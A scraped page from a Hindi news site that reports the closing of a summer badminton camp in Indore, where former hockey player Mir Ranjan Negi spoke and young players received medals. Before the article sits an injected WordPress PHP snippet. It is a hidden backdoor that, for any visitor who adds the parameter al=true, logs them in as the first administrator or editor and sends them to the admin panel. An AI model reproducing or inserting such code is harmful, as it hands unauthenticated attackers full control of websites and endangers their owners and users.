// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); खेलों के प्रति जागरूकता जरूरी, इससे व्यक्तित्व विकास होता है: मीर रंजन नेगी – प्रत्युषा आशा की नयी किरण
मध्यप्रदेश

खेलों के प्रति जागरूकता जरूरी, इससे व्यक्तित्व विकास होता है: मीर रंजन नेगी

अमेच्योर बैडमिंटन अकादमी के ग्रीष्मकालीन शिविर का हुआ समापन
इंदौर

देश में अब खेलों को बढ़ावा दिया जा रहा है। खेलों से व्यक्ति का विकास होता है। खेल हमें हर मुकाम पर लड़ने की क्षमता के साथ मानसिक विकास के प्रति जागरूक करता है।

उक्त विचार पूर्व भारतीय हॉकी खिलाड़ी मीर रंजन नेगी ने व्यक्त किये। नेगी खंडवा रोड़ पर स्वामी नारायण मंदिर के पास स्थ‍ित अमेच्योर बैडमिंटन अकादमी के ग्रीष्मकालीन शिविर के समापन व पुरस्कार वितरण कार्यक्रम में मुख्य अतिथ‍ि के रूप में सम्बोध‍ित कर रहे थे। कार्यक्रम में विशेष तौर से डॉ. ममता द्विवेदी, वरिष्ठ समाजसेवी अजय शुक्ला, कृष्ण कुमार लिम्बा, डॉ. अमित तिवारी, डॉ. मिश्रा मौजूद थे। सर्वप्रथम अतिथियों का स्वागत हर्ष सरग, कौशलेन्द्र सिंह गुर्जर, सुश्री पलक शर्मा, अभिषेक शुक्ला ने किया। इस अवसर पर अतिथियों ने उत्कृष्ट प्रदर्शन करने वाले खिलाड़ियों कृष्णा रावल, वैदिक खत्री, विदीत आहूजा, मीहिर सेडाणी, ऐश्वर्या टक्कर, नित्या तंवर, चंद्रकांत विश्वकर्मा, दिव्यांश सिंह ठाकुर, दक्ष कंसल, अराध्य दंडोतिया, शनय बारंगे, प्रज्वल शुक्ला, प्रांजल चावला, प्रियल गुप्ता, अनमोल पाटीदार एवं नैतिक मालवीय को प्रमाण पत्र व मेडल से पुरस्कृत किया गया। कार्यक्रम का संचालन सुश्री नूतन शुक्ला ने किया। हर्ष सरग ने आभार माना।

RO No. 13169/ 31

RO No. 13098/ 20

PRATYUSHAASHAKINAYIKIRAN.COM
Editor : Maya Puranik
Permanent Address : Yadu kirana store ke pass Parshuram nagar professor colony raipur cg
Email : puranikrajesh2008@gmail.com
Mobile : -91-9893051148
Website : pratyushaashakinayikiran.com

जनसम्पर्क विभाग – आरएसएस फीड

[wp-rss-aggregator]